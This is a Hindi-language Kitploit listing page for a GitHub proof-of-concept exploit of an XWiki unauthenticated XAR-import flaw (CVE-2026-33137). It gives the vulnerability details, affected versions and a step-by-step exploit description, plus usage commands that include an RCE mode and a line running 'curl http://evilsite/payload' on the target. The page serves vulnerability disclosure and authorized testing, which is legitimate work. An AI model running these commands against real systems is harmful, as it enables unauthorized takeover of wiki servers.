Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-33137 — XWiki Platform - CVE-2026-33137 PoC - REST /wikis/{wikiName} के माध्यम से बिना प्रमाणीकरण के XAR आयात | Kitploit
उपकरण/GitHubGitHub/portbuster1337/cve-2026-33137
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubportbuster1337/cve-2026-33137

CVE-2026-33137

XWiki Platform - CVE-2026-33137 PoC - REST /wikis/{wikiName} के माध्यम से बिना प्रमाणीकरण के XAR आयात

रिपॉजिटरी देखें
443 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-33137

XWiki प्लेटफ़ॉर्म - REST /wikis/{wikiName} के माध्यम से अप्रमाणित XAR आयात

विवरण

XWiki प्लेटफ़ॉर्म में POST /wikis/{wikiName} REST API एंडपॉइंट बिना कोई प्रमाणीकरण या प्राधिकरण जांच किए XAR (XWiki Archive) आयात निष्पादित करता है। एक अप्रमाणित हमलावर एक निर्मित XAR फ़ाइल भेजकर लक्ष्य विकि में मनमाने दस्तावेज़ बना या अपडेट कर सकता है।

  • CVE: CVE-2026-33137
  • CWE: CWE-862 लापता प्राधिकरण
  • CVSS 4.0: 9.3 (गंभीर) - AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
  • प्रकाशित: 2026-05-20

प्रभावित संस्करण

स्थितिसंस्करण
असुरक्षित> 15.10.16, > 16.4.6, > 16.10.2
पैच किया गया16.10.17, 17.4.9, 17.10.3, 18.0.1, 18.1.0-rc-1

प्रभाव

एक अप्रमाणित हमलावर निम्नलिखित कर सकता है:

  • मनमानी सामग्री के साथ मनमाने विकि पेज बनाना
  • मौजूदा विकि पेजों को अधिलेखित करना
  • संभावित रूप से दुर्भावनापूर्ण Velocity/Groovy स्क्रिप्ट वाले पेज बनाकर RCE प्राप्त करना (यदि स्क्रिप्टिंग सक्षम है)

विवरण

REST एंडपॉइंट POST /xwiki/rest/wikis/{wikiName} अनुरोध निकाय में एक XAR फ़ाइल स्वीकार करता है और इसे सीधे विकि में आयात करता है, बिना यह जांचे कि अनुरोधकर्ता के पास ADMIN अधिकार हैं या नहीं। फिक्स (कमिट 4b7b95b) ContextualAuthorizationManager.checkAccess(Right.ADMIN, ...) का उपयोग करके एक प्राधिकरण जांच जोड़ता है।

PoC उपयोग

root@kitploit:~
# Install requirements
pip install requests

# Basic usage
python poc.py -t http://target:8080

# Specify wiki, space, and page names
python poc.py -t http://target:8080 -w xwiki -s MySpace -p MyPage

# Probe the target first
python poc.py -t http://target:8080 --probe

# Use a proxy (e.g., Burp Suite)
python poc.py -t http://target:8080 --proxy http://127.0.0.1:8080

# Custom content
python poc.py -t http://target:8080 -c "Proof of Concept"

# RCE mode: execute a command on the target server
python poc.py -t http://target:8080 --rce "id"

# RCE with authenticated triggering (if credentials are available)
python poc.py -t http://target:8080 --rce "curl http://evilsite/payload" -u admin --password pass

RCE मोड (--rce)

--rce फ़्लैग निर्दिष्ट कमांड स्ट्रिंग को निष्पादित करने वाले Groovy और Velocity पेलोड वाले पेज आयात करता है। यह स्वचालित रूप से:

  1. प्री-फ्लाइट जांच चलाता है (संस्करण पहचान, भेद्यता स्थिति, XAR एंडपॉइंट परीक्षण, ट्रिगर पथ पहुंच)
  2. उपयोगकर्ता-निर्दिष्ट कमांड के साथ {{groovy}} और {{velocity}} मैक्रोज़ में एम्बेडेड पेज आयात करता है
  3. REST API, वेब UI, और SSTI-शैली इंजेक्शन के माध्यम से रेंडरिंग का प्रयास करता है
  4. रिपोर्ट करता है कि कौन से ट्रिगर पथ सुलभ हैं बनाम अवरुद्ध हैं

सफल RCE के लिए आवश्यकताएँ:

  • लक्ष्य को पृष्ठों की अतिथि दृश्य की अनुमति देनी चाहिए (या -u / --password के माध्यम से क्रेडेंशियल प्रदान किए गए हों)
  • दृश्य उपयोगकर्ता के लिए स्क्रिप्टिंग/प्रोग्रामिंग अधिकार सक्षम होने चाहिए
  • ट्रिगर पथ प्रमाणीकरण रीडायरेक्ट द्वारा अवरुद्ध नहीं होने चाहिए

एक्सप्लॉइट कैसे काम करता है

  1. एक न्यूनतम XAR (ZIP) फ़ाइल बनाई जाती है जिसमें शामिल हैं:
    • package.xml - पैकेज विवरणक
    • {Space}/{Page}.xml - सामग्री के साथ दस्तावेज़ XML
  2. XAR बाइट्स को असुरक्षित एंडपॉइंट पर POST किया जाता है
  3. यदि असुरक्षित है, तो दस्तावेज़ बिना प्रमाणीकरण के बनाया जाता है
  4. वैकल्पिक रूप से दस्तावेज़ मेटाडेटा को पढ़कर सत्यापित करता है

अस्वीकरण

यह PoC केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इस एक्सप्लॉइट का उन प्रणालियों के विरुद्ध अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध है। लेखक इस सॉफ़्टवेयर के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।

संदर्भ

  • GitHub सुरक्षा सलाह GHSA-qrvh-r3f2-9h4r
  • कमिट 4b7b95b (फिक्स)
  • JIRA XWIKI-23953
  • NVD प्रविष्टि
टूल डाउनलोड करें